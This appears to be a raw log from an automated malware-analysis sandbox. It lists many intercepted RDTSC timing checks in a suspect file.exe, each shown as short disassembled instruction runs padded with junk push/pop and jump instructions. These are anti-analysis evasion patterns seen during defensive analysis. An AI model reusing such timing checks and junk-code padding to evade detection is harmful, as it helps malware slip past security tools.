Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A0F second address: B78A16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A16 second address: B78A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB8FCD64884h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6CFB second address: BC6D07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCCA77B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC6D07 second address: BC6D33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD64883h 0x0000000d jmp 00007FB8FCD64881h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB948 second address: BCB954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FB8FCCA77B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB954 second address: BCB958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB958 second address: BCB95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB95C second address: BCB977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8FCD64883h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB977 second address: BCB97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1BA second address: BCB1C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1C0 second address: BCB1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1C9 second address: BCB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB8FCD64876h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FB8FCD64876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1DE second address: BCB1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1E2 second address: BCB1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FB8FCD64876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d je 00007FB8FCD64886h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCB1F9 second address: BCB1FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3BE7 second address: BD3C48 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8FCD64876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FB8FCD64883h 0x00000010 pop esi 0x00000011 pop edx 0x00000012 pushad 0x00000013 jmp 00007FB8FCD64881h 0x00000018 jg 00007FB8FCD64883h 0x0000001e jnl 00007FB8FCD6487Eh 0x00000024 pushad 0x00000025 jmp 00007FB8FCD6487Bh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1F61 second address: BD1F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB8FCCA77C1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jne 00007FB8FCCA77B6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2548 second address: BD2561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64883h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2561 second address: BD2565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2819 second address: BD283E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jne 00007FB8FCD64876h 0x0000000f jmp 00007FB8FCD6487Bh 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 jnl 00007FB8FCD64878h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD2D5C second address: BD2D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCCA77C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FB8FCCA77B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD3030 second address: BD3046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD38B2 second address: BD38B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD38B9 second address: BD38C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD85DC second address: BD85E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD85E3 second address: BD85ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB970 second address: BDB999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C9h 0x00000009 jne 00007FB8FCCA77B6h 0x0000000f popad 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB999 second address: BDB9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB8FCD64888h 0x0000000a popad 0x0000000b pushad 0x0000000c jns 00007FB8FCD6487Ch 0x00000012 jbe 00007FB8FCD64882h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDB9CC second address: BDB9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8FCCA77B6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007FB8FCCA77B6h 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jc 00007FB8FCCA77B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBB10 second address: BDBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBB14 second address: BDBB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBC74 second address: BDBC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8FCD64876h 0x0000000a jmp 00007FB8FCD6487Ah 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB8FCD6487Ah 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBC9F second address: BDBCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE1E second address: BDBE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE26 second address: BDBE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE31 second address: BDBE50 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCD64887h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBE50 second address: BDBE58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBF98 second address: BDBF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BDBF9C second address: BDBFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C9h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE5E04 second address: BE5E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4A64 second address: BE4A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007FB8FCCA77B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4A72 second address: BE4A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D5D second address: BE4D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D63 second address: BE4D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCD64886h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D7F second address: BE4D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007FB8FCCA77B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D8E second address: BE4D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE4D94 second address: BE4DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE3BFE second address: BE3C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE9DC7 second address: BE9DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED23D second address: BED299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD64887h 0x00000007 jmp 00007FB8FCD64888h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FB8FCD64888h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB8FCD6487Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BED299 second address: BED2A3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8FCCA77B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF3972 second address: BF3977 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324DD second address: B324EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FB8FCCA77B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324EA second address: B324F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324F0 second address: B32509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B32509 second address: B3250D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3250D second address: B3251A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3251A second address: B3251E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA620 second address: BFA624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA624 second address: BFA63D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Bh 0x00000007 jmp 00007FB8FCD6487Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA63D second address: BFA643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA643 second address: BFA647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFEA78 second address: BFEA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE4E4 second address: BFE55C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8FCD64878h 0x00000008 pushad 0x00000009 jbe 00007FB8FCD64876h 0x0000000f jnp 00007FB8FCD64876h 0x00000015 jmp 00007FB8FCD64882h 0x0000001a je 00007FB8FCD64876h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push edx 0x00000027 pop edx 0x00000028 jmp 00007FB8FCD64882h 0x0000002d jbe 00007FB8FCD64876h 0x00000033 jl 00007FB8FCD64876h 0x00000039 popad 0x0000003a jng 00007FB8FCD64892h 0x00000040 jmp 00007FB8FCD64886h 0x00000045 jnp 00007FB8FCD64876h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFE6C4 second address: BFE6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01A98 second address: C01AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB8FCD64876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AA4 second address: C01ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FB8FCCA77B6h 0x0000000e jbe 00007FB8FCCA77B6h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01ABC second address: C01ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FB8FCD64876h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01ACD second address: C01AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AD3 second address: C01AD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01AD9 second address: C01AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FB8FCCA77BEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C015FD second address: C01612 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FB8FCD6487Bh 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C01612 second address: C01629 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8FCCA77BCh 0x00000008 pushad 0x00000009 jns 00007FB8FCCA77B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0178D second address: C01793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EAFD second address: C0EB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EB07 second address: C0EB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0EB0C second address: C0EB32 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007FB8FCCA77B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007FB8FCCA77B6h 0x00000013 jmp 00007FB8FCCA77BFh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E989 second address: C0E9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8FCD64880h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0E9A3 second address: C0E9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB8FCCA77B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C100FA second address: C1010F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1010F second address: C10115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C183A1 second address: C183B5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8FCD6487Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C183B5 second address: C183B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C195FD second address: C19603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C19603 second address: C19608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D1F5 second address: C1D25E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB8FCD6487Bh 0x00000008 jmp 00007FB8FCD64881h 0x0000000d pop edi 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jp 00007FB8FCD64876h 0x0000001f jmp 00007FB8FCD64887h 0x00000024 popad 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a jmp 00007FB8FCD6487Dh 0x0000002f jmp 00007FB8FCD6487Dh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36679 second address: C3667D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C37DB0 second address: C37DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8FCD6487Bh 0x0000000b popad 0x0000000c jbe 00007FB8FCD6487Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C39762 second address: C39775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007FB8FCCA77B6h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C4C6 second address: C3C4E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8FCD6487Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FB8FCD6487Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C03E second address: C3C04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8FCCA77BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C04C second address: C3C058 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C058 second address: C3C060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B634 second address: C4B639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B639 second address: C4B64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8FCCA77BEh 0x00000009 rdtsc
